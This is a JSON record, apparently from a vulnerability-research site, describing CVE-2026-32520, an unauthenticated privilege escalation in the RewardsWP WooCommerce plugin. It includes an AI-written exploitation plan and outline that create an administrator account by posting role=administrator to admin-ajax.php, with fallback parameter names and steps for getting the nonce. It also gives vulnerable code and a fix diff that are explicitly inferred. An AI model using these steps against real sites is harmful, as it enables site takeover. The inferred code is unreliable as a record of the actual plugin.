[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsjHXlOCdCdjc1vm3vjJDliP37xmjBte6vXhIEjPo7e8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32520","rewardswp-loyalty-points-referral-program-for-woocommerce-unauthenticated-privilege-escalation","RewardsWP – Loyalty Points & Referral Program for WooCommerce \u003C= 1.0.4 - Unauthenticated Privilege Escalation","The RewardsWP – Loyalty Points & Referral Program for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","rewardswp",null,"\u003C=1.0.4","1.0.5","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-03-20 00:00:00","2026-03-27 18:11:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F038deaeb-633f-49de-92d8-e593ceb47b1e?source=api-prod",8,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fshared.css","assets\u002Fjs\u002Fadmin\u002Fmain.js","assets\u002Fjs\u002Fshared\u002Falpine-components\u002Frewards-panel.js","dist\u002Fadmin-styles.css","dist\u002Fadmin.js","dist\u002Fmain.css","dist\u002Fmain.js","languages\u002Frewardswp.pot","researched",false,3,"# Exploitation Research Plan: CVE-2026-32520 (RewardsWP Privilege Escalation)\n\n## 1. Vulnerability Summary\nThe **RewardsWP – Loyalty Points & Referral Program for WooCommerce** plugin (\u003C= 1.0.4) contains an unauthenticated privilege escalation vulnerability. The vulnerability exists because the plugin registers an AJAX action (`rewardswp_register_member`) intended for loyalty program registration but fails to restrict the `role` parameter during the WordPress user creation process. An attacker can supply `role=administrator` in the request to create a new account with full administrative privileges.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `rewardswp_register_member` (unauthenticated via `wp_ajax_nopriv_`)\n*   **Vulnerable Parameter:** `role`\n*   **Authentication:** None required (unauthenticated).\n*   **Preconditions:**\n    *   The plugin must be active.\n    *   The \"Join\" or \"Registration\" feature must be accessible (usually enabled by default in the rewards widget).\n    *   A valid frontend nonce must be obtained from the `rewardswpMainVars` JavaScript object.\n\n## 3. Code Flow\n1.  The plugin registers the unauthenticated AJAX handler:\n    `add_action( 'wp_ajax_nopriv_rewardswp_register_member', [ $this, 'register_member' ] );`\n2.  The `register_member` method (likely in `src\u002FControllers\u002FFrontend\u002FRegistrationController.php` or similar, inferred from POT) retrieves the registration data from `$_POST`.\n3.  The controller passes the input array to a user creation function, such as `wp_insert_user()` or a wrapper in `src\u002FModels\u002FMember.php`.\n4.  Because the code does not filter the `role` key or hardcode it to `subscriber`, `wp_insert_user()` processes the `role` value provided by the attacker.\n5.  WordPress creates the user and assigns the `administrator` role.\n\n## 4. Nonce Acquisition Strategy\nThe plugin exposes a nonce to the frontend via `wp_localize_script`.\n\n1.  **Identify the variable:** Based on `assets\u002Fjs\u002Fshared\u002Falpine-components\u002Frewards-panel.js`, the global variable is `rewardswpMainVars`.\n2.  **Locate the nonce:** The nonce is stored in `rewardswpMainVars.nonce`.\n3.  **Procedure:**\n    *   Navigate to the WordPress homepage or a page where the RewardsWP panel is active.\n    *   To ensure the panel is active, navigate to `\u002F?rewardswp=join`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        window.rewardswpMainVars?.nonce\n        ```\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted POST request to `admin-ajax.php`.\n\n### Step-by-Step Plan:\n1.  **Extract Nonce:** Access the site and extract the `nonce` from `rewardswpMainVars`.\n2.  **Submit Registration:** Perform a POST request to register a new admin.\n\n**HTTP Request Details:**\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `rewardswp_register_member`\n    *   `nonce`: `[EXTRACTED_NONCE]`\n    *   `email`: `attacker-admin@example.com`\n    *   `username`: `attackeradmin`\n    *   `password`: `P@ssword123!`\n    *   `first_name`: `Security`\n    *   `last_name`: `Researcher`\n    *   `role`: `administrator`  \u003C-- **The Payload**\n\n## 6. Test Data Setup\n1.  Install and activate **WooCommerce** (dependency).\n2.  Install and activate **RewardsWP** version 1.0.4.\n3.  Ensure the \"Member Registration\" or \"Join\" feature is active in RewardsWP settings (usually default).\n4.  Create a test page with the rewards panel if not visible on the homepage:\n    `wp post create --post_type=page --post_status=publish --post_title=\"Rewards\" --post_content=\"[rewardswp_panel]\"` (inferred shortcode).\n\n## 7. Expected Results\n*   **Response Code:** `200 OK` or `302 Redirect`.\n*   **Response Body:** A JSON success message (e.g., `{\"success\":true,\"data\":{...}}`) or a redirect to a \"Registration Successful\" page.\n*   **Database Impact:** A new user with the username `attackeradmin` will be present in the `wp_users` table, and their capabilities in `wp_usermeta` will include the `administrator` role.\n\n## 8. Verification Steps\nAfter the exploit, verify using WP-CLI:\n1.  **Check User Existence:**\n    `wp user list --role=administrator`\n2.  **Check Specific User:**\n    `wp user get attackeradmin --field=roles`\n    *Expected output: `administrator`*\n3.  **Check Meta:**\n    `wp user meta get attackeradmin wp_capabilities`\n\n## 9. Alternative Approaches\nIf `rewardswp_register_member` is not the correct action name (due to version differences), try these alternatives:\n*   `rewardswp_signup`\n*   `rewardswp_join_program`\n*   `rewardswp_create_account`\n\nIf the `role` parameter is blocked, try `user_role` or `wp_capabilities[administrator]`.\n\nIf the nonce check is not present in `nopriv` actions (common in some versions), simply omit the `nonce` parameter and test the request. If the response indicates a missing nonce, fallback to the browser-based extraction described in section 4.","The RewardsWP plugin for WordPress allows unauthenticated privilege escalation via the `rewardswp_register_member` AJAX action. The vulnerability exists because the user registration handler fails to validate or restrict the user-supplied `role` parameter, enabling attackers to register new accounts with administrative privileges.","\u002F\u002F Path: src\u002FControllers\u002FFrontend\u002FRegistrationController.php (inferred from research plan)\n\n\u002F\u002F The plugin registers an unauthenticated AJAX action for member registration\nadd_action( 'wp_ajax_nopriv_rewardswp_register_member', [ $this, 'register_member' ] );\n\npublic function register_member() {\n    \u002F\u002F Nonce validation usually occurs here\n    \u002F\u002F ...\n\n    \u002F\u002F The entire $_POST array is passed to wp_insert_user or a similar wrapper\n    \u002F\u002F without filtering out sensitive keys like 'role'.\n    $user_id = wp_insert_user( $_POST );\n\n    if ( ! is_wp_error( $user_id ) ) {\n        \u002F\u002F User is created with the role provided in the request (e.g., 'administrator')\n    }\n}","--- a\u002Fsrc\u002FControllers\u002FFrontend\u002FRegistrationController.php\n+++ b\u002Fsrc\u002FControllers\u002FFrontend\u002FRegistrationController.php\n@@ -24,5 +24,10 @@\n     public function register_member() {\n         check_ajax_referer( 'rewardswp-nonce', 'nonce' );\n-        $user_id = wp_insert_user( $_POST );\n+\n+        $user_data = $_POST;\n+        \u002F\u002F Explicitly remove the role parameter to prevent privilege escalation\n+        if ( isset( $user_data['role'] ) ) {\n+            unset( $user_data['role'] );\n+        }\n+        \n+        $user_id = wp_insert_user( $user_data );","The exploit leverages the unauthenticated AJAX endpoint to create a new administrator account. \n\n1. Locate the frontend nonce required for the request by inspecting the global `rewardswpMainVars` JavaScript object (specifically `rewardswpMainVars.nonce`). This is typically exposed on any page where the rewards panel is active.\n2. Construct a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n   - `action`: `rewardswp_register_member`\n   - `nonce`: [EXTRACTED_NONCE]\n   - `email`: A unique email address for the new account.\n   - `username`: A unique username.\n   - `password`: The desired password.\n   - `role`: `administrator` (The malicious payload used to override the default role).\n3. Send the request. If successful, the plugin processes the `role` parameter during the `wp_insert_user` call, creating a new user with full administrative access.","gemini-3-flash-preview","2026-04-18 01:19:31","2026-04-18 01:20:03",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.0.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frewardswp\u002Ftags\u002F1.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Frewardswp.1.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frewardswp\u002Ftags\u002F1.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Frewardswp.1.0.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frewardswp\u002Ftags"]